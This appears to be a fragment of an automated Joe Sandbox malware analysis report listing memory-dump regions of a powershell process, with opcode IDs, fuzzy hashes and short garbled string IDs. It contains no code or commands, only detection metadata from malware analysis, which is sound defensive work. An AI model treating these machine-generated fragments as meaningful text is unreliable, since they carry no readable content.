                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 674430c9c5a9afdd0e9ff65fe3424393a97367cd9ba659eff039ae744214d6cb
                                                  • Instruction ID: 2f875ee044c6d7aaab66741f5894c5fa1a920ec510f0df2f38ef6d02757b5068
                                                  • Opcode Fuzzy Hash: 674430c9c5a9afdd0e9ff65fe3424393a97367cd9ba659eff039ae744214d6cb
                                                  • Instruction Fuzzy Hash: DEF09E3670C3504FDB266B3454281AE7F53FBDA151704007FC046CB1A1EA55D74783D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f5c5367418afb2b34861757fef96a231fa7e123ec284f2f3d9f104a27e51438
                                                  • Instruction ID: b344fa7d87e08980e65588cf7f56719660517893d1471ee5631bfffd56505a0a
                                                  • Opcode Fuzzy Hash: 9f5c5367418afb2b34861757fef96a231fa7e123ec284f2f3d9f104a27e51438
                                                  • Instruction Fuzzy Hash: 59E01A34C1014A9BCB2CEF70D8575AEBF74FB14301F9081AEDD27926A4EA71155ACF82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 95dd205dc60a6465a834a02cebbc9df0bbfdef7cf0e73cc97ca10f9886b3d703
                                                  • Instruction ID: 7447765b89ee43b7c2ce8fb77a4dd6cc065ba9363992dd5e72decae293b25d08
                                                  • Opcode Fuzzy Hash: 95dd205dc60a6465a834a02cebbc9df0bbfdef7cf0e73cc97ca10f9886b3d703
                                                  • Instruction Fuzzy Hash: 69E026B5D1820E9F8F88EFB995421BEFBF5AB48200F10896F9819E3340E63456118F95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 360aae616d6193b6572b1956621f9f95c1fb683dd95e7ab15686f32a2f645a3a
                                                  • Instruction ID: be223886cd5c6faeaa9e649cda59f2490619937732fa56838fe10a6810a37416
                                                  • Opcode Fuzzy Hash: 360aae616d6193b6572b1956621f9f95c1fb683dd95e7ab15686f32a2f645a3a
                                                  • Instruction Fuzzy Hash: 71D05E352101209FC705AB68E548C4A7BAAEB4D6547114191E909C7362CA71EC008BE1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d864cc313016e4fdc3859cb792444a56c6c0e5ddd289f7a0538b56776120e2f
                                                  • Instruction ID: d42127ffb2fe5cfa1c68f8568c6aaecab30a1a234ba12033cc77a5162c9318a3
• Opcode Fuzzy Hash: 6d864cc313016e4fdc3859cb792444a56c6c0e5ddd289f7a0538b56776120e2f
• Instruction Fuzzy Hash: 0DD0123180500ADBCB48AB94F81A4FE7B7CAB00305F40405DE91792190DB301D5ACA80
Memory Dump Source
• Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d548ad5c0425e312511aff10c0729316efcd1acaf0e802b8be432f97f7ef8ccd
• Instruction ID: 16ba6309c21972e6408498c019edc4c9fc5c20442d31880e40965cbd89b34137
• Opcode Fuzzy Hash: d548ad5c0425e312511aff10c0729316efcd1acaf0e802b8be432f97f7ef8ccd
• Instruction Fuzzy Hash: 9AD0673480414A8BCB2CEBA4E85A5BDBB38FA10205F804169DA1753695AA702A5ACA92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q$l$l
• API String ID: 0-1821798344
• Opcode ID: bde4f26908be0610b26edcdf50a4189e6eba544b8973ee5be2858a786af8981f
• Instruction ID: eb3dca4b4c4bfe4ce4b5379ab230ee4cda24af4bb2e867577f8a7d5351858739
• Opcode Fuzzy Hash: bde4f26908be0610b26edcdf50a4189e6eba544b8973ee5be2858a786af8981f
• Instruction Fuzzy Hash: DCA139F170431E8FE7258A6D941166ABBA6DFC6211F1880FBD965CB391DA31CC42C3B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$_$$q$$q$$q$$q$$q$$q
• API String ID: 0-572712508
• Opcode ID: 17db6bf8bf8f1c995ec49d1bb42c5efa7fecd4c373d95baa0333806a38acdf93
• Instruction ID: 3a0a18a64895d69a3435eeec16f34af21e0bf6330ae68e9b426cb9b1e928b902
• Opcode Fuzzy Hash: 17db6bf8bf8f1c995ec49d1bb42c5efa7fecd4c373d95baa0333806a38acdf93
• Instruction Fuzzy Hash: 68E13DF1B04306DFEB348B69D4456AAFBF1EF85211F2480BAD825CB251EB31D961C791
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$$q$$q$$q$l$l
• API String ID: 0-3535909460
• Opcode ID: 11742dfcaeb48a22de15da703bdd9d537bdef5e5796a7af651de700aed5cec5a
• Instruction ID: 0f755fdc352e7e2ddfd3e429aca6961a8a48e29e3ff5415065e863bcb7b1b7ac
• Opcode Fuzzy Hash: 11742dfcaeb48a22de15da703bdd9d537bdef5e5796a7af651de700aed5cec5a
• Instruction Fuzzy Hash: 56514CF1B002068FFB345A6998257E6BBB2FFC5711F1880BBD965C7241DA31C942C7A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q$tPq$tPq
• API String ID: 0-3271992745
• Opcode ID: ed861bb16880ac398f33b6d4e8b4718038e32eeed20f331fc301466f105bcdab
• Instruction ID: 8a12f161af4118400cbe2c42bf1955d55fe3c581ef30052c74d1b854aafd2ece
• Opcode Fuzzy Hash: ed861bb16880ac398f33b6d4e8b4718038e32eeed20f331fc301466f105bcdab
• Instruction Fuzzy Hash: B1C14AF1B043468FE7258A299411666FBF2EFC6222F1980FBD459CB251DA31DC52C7D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q$$q$$q
• API String ID: 0-448788557
• Opcode ID: 12a9df4899c4a648b4cb38cc3170ce2e69168eb4c7b59fffc950064dffcc4657
• Instruction ID: a09e31e516ffe432b7e6a920e3cb712d8dfab4ab8dfd4a9ffc9c4b8c5307a9f4
• Opcode Fuzzy Hash: 12a9df4899c4a648b4cb38cc3170ce2e69168eb4c7b59fffc950064dffcc4657
• Instruction Fuzzy Hash: 73915CF1B043468FE725662898143AABFA2DFC6211F1880FBD555CF282EA31DC41C7E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: w3$tPq$tPq$$q
• API String ID: 0-3343979535
• Opcode ID: 732bacf41513364e9a471029f4ef7fc960914bab081cb58193b310c49f1a51d0
• Instruction ID: 17ef5713fa9692ace09d21e47a8925287a2226bc01e3ec43eb221a1465d3824f
• Opcode Fuzzy Hash: 732bacf41513364e9a471029f4ef7fc960914bab081cb58193b310c49f1a51d0
• Instruction Fuzzy Hash: 92316EF1B003859FFB249B55840576AF7F6EF85352F1580BAD5299F280DE70C841C3A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: $q$$q$$q$$q
• API String ID: 0-4102054182
• Opcode ID: 1a5f933cf9bf9a81095ac945b7fc3891c201471d763e2a4089f9598d4b4537cd
• Instruction ID: 72d5b10359663f7ee3606f4b4a9130cb9e30267cabea2e28912c3ad15deb55b7
• Opcode Fuzzy Hash: 1a5f933cf9bf9a81095ac945b7fc3891c201471d763e2a4089f9598d4b4537cd
• Instruction Fuzzy Hash: A42147F13103825BFB34566AA811737BB9AEBC2726F64847AAD25CB381DD31C841C361
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$$q$$q
• API String ID: 0-3199993180
• Opcode ID: 6a048e020019676c683e7d4841b7996d8b408ce1d8d0cdf6adab937d49965db5
• Instruction ID: bc168ea95fba9d417f60d89141a3940e1d62bd7d80e3d9bf5e3a0eca5947c022
• Opcode Fuzzy Hash: 6a048e020019676c683e7d4841b7996d8b408ce1d8d0cdf6adab937d49965db5
• Instruction Fuzzy Hash: 0A01A2A170D3C24FE72B222828201952FB29F8751072F40E7D4A1CF393C9144C06C3B7